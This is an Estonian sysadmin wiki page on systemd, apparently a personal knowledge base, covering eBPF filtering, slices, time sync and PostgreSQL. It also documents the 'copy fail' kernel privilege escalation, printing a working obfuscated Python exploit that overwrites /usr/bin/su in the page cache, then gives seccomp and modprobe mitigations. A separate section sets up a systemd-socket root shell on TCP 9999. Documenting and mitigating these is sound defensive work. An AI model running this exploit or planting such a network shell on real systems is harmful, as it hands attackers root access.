186: cgroup_skb name sd_fw_ingress tag 208d1bf35e7113d2 gpl run_time_ns 516780 run_cnt 1204
loaded_at 2026-04-20T12:44:13+0300 uid 0
xlated 184B jited 140B memlock 4096B map_ids 51
</pre>

kus

* run_cnt näitab kui mitmel korral on kitsendust rakendatud

ning

<pre>
root@ph-minio-01:~# bpftool map show id 51
51: lpm_trie name 4_nginx_06.serv flags 0x1
key 8B value 8B max_entries 3 memlock 156B
</pre>

ning

<pre>
root@ph-minio-01:~# bpftool map dump id 51
key: 20 00 00 00 08 08 08 08 value: 01 00 00 00 00 00 00 00
key: 20 00 00 00 7f 00 00 01 value: 01 00 00 00 00 00 00 00
key: 18 00 00 00 c0 a8 0a 00 value: 01 00 00 00 00 00 00 00
Found 3 elements
</pre>

sellise skriptiga saab teisendada loetavamaks

<pre>
root@ph-minio-01:~# cat bpftool-map-dump.sh
#!/bin/bash

bpftool map dump id 51 | grep '^key' | while read -r line; do
bytes=($(echo $line | cut -d: -f2))
printf "Prefix: %d | IP: %d.%d.%d.%d\n" "$((16#${bytes[0]}))" "$((16#${bytes[4]}))" "$((16#${bytes[5]}))" "$((16#${bytes[6]}))" "$((16#${bytes[7]}))"
done

root@ph-minio-01:~# ./bpftool-map-dump.sh
Prefix: 32 | IP: 8.8.8.8
Prefix: 32 | IP: 127.0.0.1
Prefix: 24 | IP: 192.168.10.0
</pre>

Tulemusena ei saa konkteinerist välja võrku mujale pöörduda.

====Slice====

<pre>
root@ph-minio-01:~# systemctl edit user.slice

root@ph-minio-01:~# cat /etc/systemd/system/user.slice.d/override.conf
[Slice]
# This is a slice, but we can still pass BPF instructions
IPAddressDeny=any
IPAddressAllow=192.168.10.0/24
IPAddressAllow=127.0.0.0/8
</pre>

kehtestada muudatus

<pre>
root@ph-minio-01:~# systemctl daemon-reload
</pre>

logida välja ja sisse ssh pealt näiteks ning

<pre>
root@ph-minio-01:~# ping 8.8.8.8
PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.
^C
--- 8.8.8.8 ping statistics ---
2 packets transmitted, 0 received, 100% packet loss, time 1005ms

root@ph-minio-01:~#
</pre>

====Misc====

bpftop esitab ülevaatlikult

[[Fail:20260420-systemd-bpf-01.png|800px]]

ebpf on seotud mitte protsessiga, aga cgroup'iga nt nginx cgroup juurde kuuluvate ebpf'ide nimekirja esitamine

<pre>
root@systemd-02:~# bpftool cgroup show /sys/fs/cgroup/system.slice/nginx.service
ID AttachType AttachFlags Name
74 cgroup_inet_ingress multi sd_fw_ingress
73 cgroup_inet_egress multi sd_fw_egress
</pre>

===20260501 - copy fail eksploit===

Väited

* küllap kõik see lugu on ajutise iseloomuga praktiliselt, st varsti saabub uus parandatud linux kernel
* pedagoogilises mõttes on see huvitav lugu
* vahetulemusi on huvitav pasteda chatgpt'le ja küsida selgitusi

====Tööpõhimõte - af_alg====

af_alg on omaette 'address family' nagu af_unix (nn unix soket), af_inet (tavaline internet), af_netlink, af_xdp jt. Tema kaudu saab eksootilisem tarkvara kasutada riistvara lähedast krüptimist, nt (kcapi - kernel crypto api)

<pre>
root@pwrk-02:/home/imre/20260430# apt-get install kcapi-tools

imre@pwrk-02:/home/imre/20260430$ date > cleartext.txt

imre@pwrk-02:/home/imre/20260430$ kcapi-enc -e -c "cbc(aes)" --passwd "MyPassword123" --iv $(openssl rand -hex 12) < cleartext.txt > encrypted.bin
kcapi-enc - Warning: Password on command line is visible in process listing and /proc! Use --passwd_fd command line option!
kcapi-enc - Warning: PBKDF2 iterations used: 131072
kcapi-enc - Warning: PBKDF2 salt used: 245b53106bb1d0cf09700fd63161dd0b59601995e368d6410d6e59adbd7e8468
</pre>

kus

* valitud krüpto 'cbc(aes)' asemel saab olla ka muud, nad kõik toimetavad af_alg soketi kaudu, aga edasi kasutavad erinevaid oskusi, nendega on seotud erinevad täiendavad kerneli moodulid - eksploitimisega on seotud konkreetselt üks - algif_aead

<pre>
imre@pwrk-02:~$ lsmod | grep alg
algif_hash 12288 0
algif_rng 12288 0
algif_skcipher 12288 0
algif_aead 12288 0
af_alg 32768 4 algif_hash,algif_skcipher,algif_aead,algif_rng
</pre>

Nn af_alg funktsionaalsuse kasutamine toimub user-space pealt ja teenindamine toimub kernel-space peal, ja nagu tavaliselt seda nö horisonti ületatakse syscall tehnika abil. syscall'il on tohtu vastutus oma sisendi kontrollimise ja oma tegevuste osas - privilegeerimata actor palub midagi korda saata väga privilegeeritud actoril; mingis mõttes on ta nagu setuid bit või sudo-abil-root-minemine.

====Tööpõhimõte - eksploit====

copy fail eksploit kasutab ära af_alg osakonnas kerneli ümbruses toimuvaid võimalusi, privilegeerimata kaustajal on võimalik kirjutada page cache sisu mingis ulatuses üle. Nt selliselt

* esmalt korraldatakse page cache peale mõni setuid bit sisselülitusega fail, nt 'su' - nt lugedes faili tavalisel viisil satub tema sisu page cache'i
* siis muudetakse sisu sobivalt page cache osakonnas (st arvuti mälus) - see on võimalik tänu eksploidi toimimisele - üldiselt on linux kerneli lubadus selline, et kui protsess (privilegeerimata protsess antud juhul) ei saa failisüsteemis faili muuta, siis ei saa ta tegeleda ka cache'itud vastava faili sisuga)
* käivitatakse muudetud failile vastav programm, kuna fail on juba page cache peal, siis failisüsteemist seda uuesti ei loeta - setuid bit kätega minnakse root shelli
* teoreetiliselt võiks olla võimalik kas vastupidine, st mõnele pahale programmile vastavale failile pannakse külge setuid bit, aga antud juhul ei ole see kõneks - seda oleks ehk raskem teha st sobiv koht cache pealt üles otsida, ja see setuid bit on faili metaandmete koosseisu st asub inode cache peal mitte page cache, ja kõneksolev eksploit sinna ei saa sodima minna
* page cache on üldiselt seotud vfs (virtual filesystem) nähtusega, st sellega, mis on nö ext4 jt failisüsteemide kohal ja protsesside all

Asjaosalised kihid

<pre>
arvutis töötavad protsessid (asuvad arvuti mälus)

|
v

vfs (virtual file system) (asub arvuti mälus)

|
v

page cache (asub arvuti mälus)

|
v

ext4 filesystem (asub plokkseadmel)

|
v

plokkseade (asub nö füüsilisel esemel)
</pre>

kus

* page cache peale tehtud muudatuse saab unustada öeldes '# echo 3 > /proc/sys/vm/drop_caches'
* page cache peale tehtud muudatuse saab põlistada ext4 failisüsteemi öeldes 'sync'
* plokkseadme puhvrid saab madalamale kihile kirjutada põlistada blockdev käsu abil

Üldiselt on syscallidel tohutu vastutus oma sisendit valideerida ja jälgida mida nad edasi teevad, tundub, et antud juhul af_alg teemaga tegelevad syscall'id seda vastutust ei kanna välja st lasevad ennast manipuleerida.

====Tööpõhimõte - leevendus====

Kõige õigem oleks kernel tarkvara parandus ja küllap see varem või hiljem saabub. Seniks on võimalik rakendada ühte- ja teistsugust leevendust (mitigation)

* uskuda, et pahatahtlik kasutaja süsteemis ei tegutse programme kohale tuues ja neid kävitades (nö tavaline veebiserver pigem ei tohiks lubada ette anda koodi mida käivitatakse; tavaline veebiserver käivitab süsteemi haldajate poolt paigaldatud koodi)
* lülitada kerneli tasemal välja af_alg funktsionaalsus (modprobe) - mõju globaalne
* lülitada syscall tulemüüri tasemel välja af_alg funktsionaalsus (nn secure computing ehk seccomp, mis omakorda põhineb bpf tehnikal, vist nn 'Seccomp-BPF', mida ei haldab bpftool (bpftool tegeleb eBPF osakonnaga nähtustega) - mõju protsessile (ja tema järglastele, või systemd service unitiga seotud protsessidele)

Kerneli tasemel välja lülitamine eeldab praktiliselt, et af_alg funktsionaalsus on realiseeritud tuuma moodulite abil (ei ole otse nn /boot/vmlinuz kerneli sisse kompileeritud). Tavaliselt on modulaarne. Mõju on globaalne.

syscall tulemüüri tasemel välja lülitamine on paindlik - saab (peab st muul viisil ei saagi praktiliselt st globaalselt ei saa (kuigi teoreetiliselt saaks init=pid=1 protsessile ka seccomp abil kitsendusi rakendada, aga tavaliselt nii ei tehta) erinevate protsesside (protsesside komplektide) jaoks muudatust kehtestada. Seejuures saab määrata, mis keeldu ületada püüdva protsessiga edasi juhtub: 1. ta töötab edasi, 2. ta töötamine lõpetatakse

Leevenduste iseloomustus

* systemd (seccomp) - operatsioonisüsteemi syscall liidesel asuv nö tulemüür, mingis mõttes asub kerneli protsesside poole vaatavas osas
* apparmor (lsm - linux security modules)- erinevate süsteemi võimekustele ligipääsemise takistamised (asub kerneli protsesside poole vaatavast osast teisel pool)
* modprobe - kerneli funktsionaalsust realiseeriv komponent (kahe esimese puhul ei saa funktsionaalust kasutada isegi kui kernelis on see iseenest kohal)

====Eksploit näide====

https://copy.fail/ - tõenäoliselt on see nö puhas eksploit, st midagi suurelt temaga katsetamine ussitama ei aja st vaevalt ta interneti isandale sama arvuti /root/.ssh sisu saadab, aga kuna ta page cache sobib ja vaevalt, et seda exploiti on liiga palju testitud ja arendatud, siis ei ole võimatu ext4 failisüsteemi riknemine, arvutis töötavate protsesside segadusse sattumine kuni os krahhini; st proovida ehk maksab, aga arvutis, mis pärast kustutatakse

<pre>
$ cat /home/tmp/cf.py
#!/usr/bin/env python3
import os as g,zlib,socket as s
def d(x):return bytes.fromhex(x)
def c(f,t,c):
a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
try:u.recv(8+t)
except:0
f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):c(f,i,e[i:i+4]);i+=4
g.system("su")

$ chmod 0755 /home/tmp/cf.py
</pre>

zabbix agent kaudu

<pre>
root@pwrk-02:~# cat /etc/zabbix/zabbix_agent2.d/misc.conf
UserParameter=cf,echo id | /home/tmp/cf.py 1>>/home/tmp/cf.log 2>&1
</pre>

käivitamine

<pre>
root@pwrk-02:~# zabbix_get -k cf -s 127.0.0.1

root@pwrk-02:~#
</pre>

logi

<pre>
root@pwrk-02:~# tail -f /home/tmp/cf.log
..
uid=0(root) gid=109(zabbix) groups=109(zabbix)
uid=0(root) gid=109(zabbix) groups=109(zabbix)
uid=0(root) gid=109(zabbix) groups=109(zabbix)
...
</pre>

page cache puhastamine ("3" kasutamine nö puhastab kõik, inode cache, page cache jne, põhimõtteliselt sobiks ka "1")

<pre>
root@pwrk-02:~# echo 3 > /proc/sys/vm/drop_caches
</pre>

katsetamisel võib olla vajalik vahel jällegi moodulid välja lülitada, nt

<pre>
root@pwrk-02:~# rmmod algif_rng algif_aead algif_skcipher algif_hash af_alg
</pre>

====Leevendus - systemd service====

Väited

* mõju on service põhine
* praktiliselt võiks rakendada avalikku võrku publitseeritud teenuste (protsesside) jaoks mille kaudu võiks olla selline python skript laadse sisu käivitamine (mingit tüüpi exec syscall rakendamine) realistlik
* öeldakse, et kasutame systemd võimalusi, tehniliselt kasutatakse linux kerneli secure compute võimalusi (seccomp)
* kehtestamiseks tuleb systemd service stop ja start öelda

systemd service unit muudatus, enne (zabbix-agent protsessi pid on 174841)

<pre>
root@pwrk-02:~# systemctl show zabbix-agent2 -p RestrictAddressFamilies
RestrictAddressFamilies=~

root@pwrk-02:/home/imre/20260430# cat /proc/174841/status | grep -i secco
Seccomp: 0
Seccomp_filters: 0
</pre>

muudatus

<pre>
# root@pwrk-02:~# systemctl edit zabbix-agent2
[Service]
RestrictAddressFamilies=~AF_ALG
# SystemCallErrorNumber=kill
# SystemCallErrorNumber=EPERM
</pre>

kus

* RestrictAddressFamilies=~AF_ALG konstruktsioon väljendab eitust st kõik protokollid on lubatud v.a. AF_ALG
* SystemCallErrorNumber kontrollib, mis rikkumist proovinud protsessiga edasi saab

peale muudatust

<pre>
root@pwrk-02:~# systemctl show zabbix-agent2 -p RestrictAddressFamilies
RestrictAddressFamilies=~AF_ALG

root@pwrk-02:/home/imre/20260430# cat /proc/174842/status | grep -i secco
Seccomp: 2
Seccomp_filters: 2
</pre>

Eksploit kasutamine annab nüüd sellise tulemuse

<pre>
root@pwrk-02:~# tail -f /home/tmp/cf.log
...
Traceback (most recent call last):
File "/home/tmp/cf.py", line 9, in <module>
while i<len(e):c(f,i,e[i:i+4]);i+=4
^^^^^^^^^^^^^^^
File "/home/tmp/cf.py", line 5, in c
a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
^^^^^^^^^^^^^^^^
File "/usr/lib/python3.12/socket.py", line 233, in __init__
_socket.socket.__init__(self, family, type, proto, fileno)
OSError: [Errno 97] Address family not supported by protocol
</pre>

====Leevendus - apparmor profile====

TODO

====Leevendus - modprobe====

Väited

* mõju on globaalne süsteemile - võib olla on see liiga suure mõjuga st arvuti juures midagi siiski vajab af_alg

<pre>
# cat /etc/modprobe.d/mitigate-copy-fail.conf
install algif_aead /bin/true
</pre>

kus

* 'install algif_aead' element ütleb, et kui toimub algif_aead mooduli laadimise attampt, siis hoopis täita järgnev käsk - '/bin/true' (mingi teooria kohaselt on /bin/true kasutamine sobivam kui /bin/false kuna vea saamisel võiks süsteem proovida veelkorra moodulit laadida jne)
* selle käsu andmisel tehniliselt ollakse õnnelik iseensest kuigi sisuliselt midagi ei muutu
* muudatus kehtestub koheselt

ning parem oleks ehk ka initramfs uuesti tekitada

<pre>
root@pwrk-02:~# lsinitramfs /boot/initrd.img | grep alg
usr/lib/modules/6.8.0-110-generic/kernel/crypto/af_alg.ko.zst
usr/lib/modules/6.8.0-110-generic/kernel/crypto/algif_aead.ko.zst
usr/lib/modules/6.8.0-110-generic/kernel/crypto/algif_hash.ko.zst
usr/lib/modules/6.8.0-110-generic/kernel/crypto/algif_rng.ko.zst
usr/lib/modules/6.8.0-110-generic/kernel/crypto/algif_skcipher.ko.zst
usr/lib/modules/6.8.0-110-generic/kernel/drivers/i2c/algos
usr/lib/modules/6.8.0-110-generic/kernel/drivers/i2c/algos/i2c-algo-bit.ko.zst
usr/lib/modules/6.8.0-110-generic/kernel/net/xfrm/xfrm_algo.ko.zst
</pre>

ja

<pre>
root@pwrk-02:~# update-initramfs -u
update-initramfs: Generating /boot/initrd.img-6.8.0-110-generic
I: The initramfs will attempt to resume from /dev/dm-2
I: (/dev/mapper/system-swap)
I: Set the RESUME variable to override this.

root@pwrk-02:~# lsinitramfs /boot/initrd.img | grep 'etc/modprobe.d'
etc/modprobe.d
etc/modprobe.d/amd64-microcode-blacklist.conf
etc/modprobe.d/blacklist-ath_pci.conf
etc/modprobe.d/blacklist-firewire.conf
etc/modprobe.d/blacklist-framebuffer.conf
etc/modprobe.d/blacklist-rare-network.conf
etc/modprobe.d/blacklist.conf
etc/modprobe.d/dkms.conf
etc/modprobe.d/intel-microcode-blacklist.conf
etc/modprobe.d/iwlwifi.conf
etc/modprobe.d/mdadm.conf
etc/modprobe.d/mitigate-copy-fail.conf
root@pwrk-02:~#
</pre>

====Misc - docker rootful====

docker rootful puhul tuleb muuta kahte service'it - kuna child protsessid pärivad vanematelt seccomp jms omadused, siis mõju on tõhus

* docker
* containerd

====Debian====

20260501 ilmus Debian operatsioonisüsteemile parandatud tuum

[[Fail:20260502-debian-copy-fail-01.png|1000px]]

kus

* https://www.debian.org/security/
* https://security-tracker.debian.org/tracker/source-package/linux
* muudatusi saab otsida globaalse CVE nime abil (nt CVE-2026-31431)

====Ubuntu====

20260501 ilmus Ubuntu operatsioonisüsteemile parandatud kmod pakett

[[Fail:20260502-ubuntu-copy-fail-01.png|1000px]]

kus

* kmod paketis sisaldub fail etc/modprobe.d/disable-algif_aead.conf

<pre>
root@pwrk-02:~/20260502# cat etc/modprobe.d/disable-algif_aead.conf
# Disable algif_aead module due to CVE-2026-31431 (AKA copy.fail)
# This will likely be re-enabled in a subsequent update once an updated
# kernel has been deployed.
# Blacklisting the module isn't sufficient, we need to do as below:
install algif_aead /bin/false
</pre>

* küllap parandatud tuum ilmub seejärel

Tulemus paistab selline

<pre>
root@moraal:~# uname -a
Linux moraal 6.8.0-111-generic #111-Ubuntu SMP PREEMPT_DYNAMIC Sat Apr 11 23:16:02 UTC 2026 x86_64 x86_64 x86_64 GNU/Linux

root@moraal:~# modprobe algif_aead
modprobe: ERROR: ../libkmod/libkmod-module.c:1084 command_do() Error running install command '/bin/false' for module algif_aead: retcode 1
modprobe: ERROR: could not insert 'algif_aead': Invalid argument
</pre>

====Proxmox====

20260501 on ilmunud no-subscription repodesse v. 7 tuum, seda see 'copy fail' haavatavus ei puuduta

<pre>
root@pve-svc-02:~# uname -a
Linux pve-svc-02 7.0.0-3-pve #1 SMP PREEMPT_DYNAMIC PMX 7.0.0-3 (2026-04-21T22:56Z) x86_64 GNU/Linux
</pre>

====Kasulikud lisamaterjalid====

* https://oneuptime.com/blog/post/2026-03-02-how-to-configure-systemd-service-hardening-on-ubuntu/view
* https://oneuptime.com/blog/post/2026-03-02-how-to-use-seccomp-to-restrict-system-calls-on-ubuntu/view

===20260508 - dirty frag eksploit===

TODO

chatgpt üks pakkumine

<pre>
[Service]
# Blocks the RxRPC network protocol specifically
RestrictAddressFamilies=~AF_RXRPC

# Prevents gaining root via setuid binaries (essential for LPE defense)
NoNewPrivileges=yes

# Blocks the kernel module from being auto-loaded
ProtectKernelModules=yes

# Restricts namespaces (blocks the ESP variant requirement)
RestrictNamespaces=yes
</pre>

Random linux arvutis toetatud protokollide perekonnad (2026 aastal on neid kokku ca 40 tükki)

<pre>
root@pve-wrx90e:~# cat /proc/net/protocols
protocol size sockets memory press maxhdr slab module cl co di ac io in de sh ss gs se re bi br ha uh gp em
SCO 896 0 -1 NI 0 no bluetooth n n n n n n n n n n n n n n n n n n
L2CAP 880 0 -1 NI 0 no bluetooth n n n n n n n n n n n n n n n n n n
HCI 936 0 -1 NI 0 no bluetooth n n n n n n n n n n n n n n n n n n
PACKET 1600 0 -1 NI 0 no kernel n n n n n n n n n n n n n n n n n n
MPTCPv6 2128 1 949 no 0 yes kernel y y y n y y y y y y y y n n y y y n
PINGv6 1408 0 -1 NI 0 yes kernel y y y n n y n n y y y y y y n y y n
RAWv6 1408 0 -1 NI 0 yes kernel y y y n y y y n y y y y y y y y n n
UDPLITEv6 1472 0 0 NI 0 yes kernel y y y n y y y n y y y y n n y y y n
UDPv6 1472 2 0 NI 0 yes kernel y y y n y y y n y y y y n n y y y n
TCPv6 2560 9 949 no 320 yes kernel y y y y y y y y y y y y n y y y y y
XDP 1024 0 -1 NI 0 no kernel n n n n n n n n n n n n n n n n n n
UNIX-STREAM 1152 628 -1 NI 0 yes kernel y n n n n n n n n n n n n n n n n n
UNIX 1152 65 -1 NI 0 yes kernel y n n n n n n n n n n n n n n n n n
UDP-Lite 1344 0 0 NI 0 yes kernel y y y n y y y n y y y y n n y y y n
MPTCP 2000 0 949 no 0 yes kernel y y y n y y y y y y y y n n y y y n
PING 1056 0 -1 NI 0 yes kernel y y y n n y n n y y y y y y n y y n
RAW 1216 0 -1 NI 0 yes kernel y y y n y y y n y y y y y y y y n n
UDP 1344 3 0 NI 0 yes kernel y y y n y y y n y y y y n n y y y n
TCP 2432 23 949 no 320 yes kernel y y y y y y y y y y y y n y y y y y
MCTP 872 0 -1 NI 0 no kernel y n n n n y n n n n n n n n y y n n
NETLINK 1120 77 -1 NI 0 no kernel n n n n n n n n n n n n n n n n n n
</pre>

Kasulikud lisamaterjalid

* https://github.com/V4bel/dirtyfrag

===bootshell===

Osutub, et systemd pid=1 protsess on selles mõttes unikaalne, et on võimalik käimasolevale protsessile seadistada juurde porte, millel ta teenindab. Näide avab üle võrgu shell kasutamise võimalus, arusaadavalt on see äärmiselt ebaturvaline praktiliselt kasutamiseks

<pre>
root@zabbix-pub-01:~# cat /etc/systemd/system/bootshell.socket
[Unit]
Description=Neutral Side-Channel Boot Shell Socket

[Socket]
ListenStream=9999
Accept=yes

[Install]
WantedBy=sockets.target

root@zabbix-pub-01:~# cat /etc/systemd/system/bootshell@.service
[Unit]
Description=Neutral Side-Channel Boot Shell Service

[Service]
ExecStart=-/bin/bash -i
StandardInput=socket
StandardOutput=socket
StandardError=socket
</pre>

Aktiveerimine

<pre>
root@zabbix-pub-01:~# systemctl daemon-reload
root@zabbix-pub-01:~# systemctl enable --now bootshell.socket
</pre>

Tulemusena

<pre>
root@zabbix-pub-01:~# netstat -lnpt | grep 9999
tcp6 0 0 :::9999 :::* LISTEN 1/init
</pre>

Kasutamiseks tuleb üle võrgu tekitada tcp ühendus, nt netcat programmiga

<pre>
imreoolberg@Imres-MacBook-Air ~ % nc 192.168.10.193 9999
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
root@zabbix-pub-01:/# hostname -f
hostname -f
zabbix-pub-01
root@zabbix-pub-01:/# exit
exit
exit
imreoolberg@Imres-MacBook-Air ~ %
</pre>

===systemd-coredump===

TODO

Kasulikud lisamaterjalid

* https://oneuptime.com/blog/post/2026-03-02-how-to-use-systemd-coredump-for-crash-analysis-on-ubuntu/view

===Kasulikud lisamaterjalid===

* [[:Systemd-nspawn kasutamine operatsioonisüsteemiga Debian]]
* http://en.wikipedia.org/wiki/Systemd
* http://blog.exppad.com/article/a-docker-like-container-management-using-systemd
* http://0pointer.net/blog/projects/systemd-for-admins-1.html
* http://zero-knowledge.org/post/92
* http://0pointer.de/public/systemd-ebook-psankar.pdf
* http://ktaraghi.blogspot.com/2013/11/what-is-systemd-and-how-it-works-part-1.html

Systemd kasutamine

2026-06-20T14:06:11Z

Imre: /* systemd-coredump */

===Sissejuhatus===

systemd http://freedesktop.org/wiki/Software/systemd/ ...

Tundub, et 2014 aasta lõpus on Debian v. 8 Jessie koosseisus vaikimisi systemd

# ls -ld /sbin/init
lrwxrwxrwx 1 root root 20 Sep 28 22:33 /sbin/init -> /lib/systemd/systemd

===Tööpõhimõte===

* Turvalisus ja tegevuste isoleerimine failisüsteemi ja võrgu tasemel, http://0pointer.de/blog/projects/security.html
* SysV käivitusskripti on imperatiivsed, st shell skriptid praktiliselt, systemd nö käivitusskriptid on deklaratiivsed, st nn .ini failidele sarnase sisuga

===Paigaldamine===

Tundub, et minimaalsele keskkonnale (nt debootstrap abil moodustatud) tuleb juurde lisada dbus ja polkit tugi, vastasel korral nt systemd-cgls programm ei tööta)

# apt-get install dbus libpolkit-agent-1-0

===Kasutamine===

Teenuse oleku küsimiseks sobib öelda

# systemctl status ssh.service
● ssh.service - OpenBSD Secure Shell server
Loaded: loaded (/lib/systemd/system/ssh.service; enabled)
Active: active (running) since Tue 2014-11-04 02:43:10 EET; 18h ago
Main PID: 1956 (sshd)
CGroup: /system.slice/ssh.service
└─1956 /usr/sbin/sshd -D

kus

# cat /lib/systemd/system/ssh.service
[Unit]
Description=OpenBSD Secure Shell server
After=network.target auditd.service
ConditionPathExists=!/etc/ssh/sshd_not_to_be_run

[Service]
EnvironmentFile=-/etc/default/ssh
ExecStart=/usr/sbin/sshd -D $SSHD_OPTS
ExecReload=/bin/kill -HUP $MAINPID
KillMode=process
Restart=on-failure

[Install]
WantedBy=multi-user.target
Alias=sshd.service

Teenuste nimekirja esitamiseks

# systemctl list-units --type=service | head -n 5
UNIT LOAD ACTIVE SUB DESCRIPTION
accounts-daemon.service loaded active running Accounts Service
acpid.service loaded active exited LSB: Start the Advanced Configuration and Power Interface daemon
amavis-mc.service loaded active exited LSB: Startup script for amavis master supervisor
amavis.service loaded active running LSB: Starts amavisd-new mailfilter

Tundub, et teenus saab olla mitmes olekus, üks variant teenuseid on sellised, mis arvuti käivitamisel nö korraks töötavad midagi sisse lülitades ja siis teevad exit, nt

# systemctl list-units --type=service --state=exited
UNIT LOAD ACTIVE SUB DESCRIPTION
getty-static.service loaded active exited getty on tty2-tty6 if dbus and logind are not available
kbd.service loaded active exited LSB: Prepare console
keymap.service loaded active exited LSB: Set keymap
modules_dep.service loaded active exited LSB: modules.dep creation.
netfilter-persistent.service loaded active exited netfilter persistent configuration
networking.service loaded active exited LSB: Raise network interfaces.
quota.service loaded active exited Check And Enable File System Quotas
rc-local.service loaded active exited /etc/rc.local Compatibility
systemd-random-seed.service loaded active exited Load/Save Random Seed

===systemd-timedated===

Tööpõhimõte

* systemd-timedated on dispetšer, mis vahendab seadistuse utiliiti timedatectl konkreetsete ntp serveritega (nt chrony, systemd-timesyncd)
* systemd-timedated ei tööta pidavalt, ta käivitub dbus juhtimisel

timedatectl programmiga saab seadistada ajavööndit jms

# timedatectl list-timezones
# timedatectl set-timezone Europe/Tallinn

systemd-timesyncd või chrony on ntp klient deemon, mis tuleb kasutamiseks sisse lülitada

# timedatectl set-ntp true

Tundub, et samaväärne on öelda

# systemctl enable systemd-timesyncd
# systemctl start systemd-timesyncd

või 'systemctl enable|disable chrony', aga ehk on õigem opereerida timedatectl abil

Töötamissel annab timedatactl saranase vastuse

# timedatectl status
Local time: Fri 2015-07-31 01:21:26 EEST
Universal time: Thu 2015-07-30 22:21:26 UTC
RTC time: Thu 2015-07-30 22:21:26
Time zone: Europe/Tallinn (EEST, +0300)
NTP enabled: yes
NTP synchronized: no
RTC in local TZ: no
DST active: yes
Last DST change: DST began at
Sun 2015-03-29 02:59:59 EET
Sun 2015-03-29 04:00:00 EEST
Next DST change: DST ends (the clock jumps one hour backwards) at
Sun 2015-10-25 03:59:59 EEST
Sun 2015-10-25 03:00:00 EET

kus

* valitud ajavööndi Daylight Saving Time algus ja lõpp
* kas NTP teenust töötab (systemd-timesyncd)

Spetsiifilise NTP serveri kasutamiseks sobib näidata ta seadistusfailis /etc/systemd/timesyncd.conf

# cat /etc/systemd/timesyncd.conf
[Time]
Servers=10.192.0.53

ja muudatuse kehtestamiseks öelda

# systemctl restart systemd-timesyncd

Tulemusena

# systemctl status systemd-timesyncd
● systemd-timesyncd.service - Network Time Synchronization
Loaded: loaded (/lib/systemd/system/systemd-timesyncd.service; enabled)
Active: active (running) since Fri 2015-07-31 09:13:18 EEST; 1min 43s ago
Docs: man:systemd-timesyncd.service(8)
Main PID: 1179 (systemd-timesyn)
Status: "Using Time Server 10.192.0.53:123 (10.192.0.53)."
CGroup: /system.slice/systemd-timesyncd.service
└─1179 /lib/systemd/systemd-timesyncd

Jul 31 09:13:17 postkast systemd-timesyncd[1179]: Using NTP server 10.192.0.53:123 (10.192.0.53).
Jul 31 09:13:18 postkast systemd-timesyncd[1179]: interval/delta/delay/jitter/drift 32s/+0.621s/0.000s/0.000s/+0ppm
Jul 31 09:13:50 postkast systemd-timesyncd[1179]: interval/delta/delay/jitter/drift 64s/+0.000s/0.000s/0.000s/+0ppm
Jul 31 09:14:54 postkast systemd-timesyncd[1179]: interval/delta/delay/jitter/drift 128s/-0.000s/0.000s/0.000s/+0ppm

Taustal tegutseb lisaks systemd-timedated deemon, mis on static, st teda kutsutakse automaatselt vajadusel välja, st käivitatakse

# systemctl status systemd-timedated
● systemd-timedated.service - Time & Date Service
Loaded: loaded (/lib/systemd/system/systemd-timedated.service; static)
Active: inactive (dead)
Docs: man:systemd-timedated.service(8)
man:localtime(5)
http://www.freedesktop.org/wiki/Software/systemd/timedated

Seos busctl osakonnaga

<pre>
root@ns-pg-01:~# busctl | grep time
org.freedesktop.timedate1 - - - (activatable) - - -

root@ns-pg-01:~# timedatectl status
Local time: Wed 2026-06-03 01:26:34 EEST
Universal time: Tue 2026-06-02 22:26:34 UTC
RTC time: Tue 2026-06-02 22:26:34
Time zone: Europe/Tallinn (EEST, +0300)
System clock synchronized: yes
NTP service: active
RTC in local TZ: no

root@ns-pg-01:~# busctl | grep time
:1.34 2449 systemd-timedat root :1.34 systemd-timedated.service - -
org.freedesktop.timedate1 2449 systemd-timedat root :1.34 systemd-timedated.service - -
</pre>

===Rakenduste kasutamine systemd keskkonnas===

====PostgreSQL kasutamine====

Mitme PostgreSQL protsesside komplekti kasutamiseks sobib esmalt järgmise eksemplari osa failisüsteemis ettevalmistada nö tavalisel viisil

# pg_createcluster 9.4 test

ning käivitada

# systemctl start postgresql@9.4-test

Mitme PostgreSQL protsesside komplekti kasutamine paistab sedasi

# ps -U postgres -o pid,user,cgroup:150,args
PID USER CGROUP COMMAND
10064 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-main.service /usr/lib/postgresql/9.4/bin/postgres -D /va ...
10070 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-main.service postgres: checkpointer process
10072 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-main.service postgres: writer process
10074 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-main.service postgres: wal writer process
10076 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-main.service postgres: autovacuum launcher process
10078 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-main.service postgres: stats collector process

10331 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-test.service /usr/lib/postgresql/9.4/bin/postgres -D /var ...
10333 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-test.service postgres: checkpointer process
10334 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-test.service postgres: writer process
10335 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-test.service postgres: wal writer process
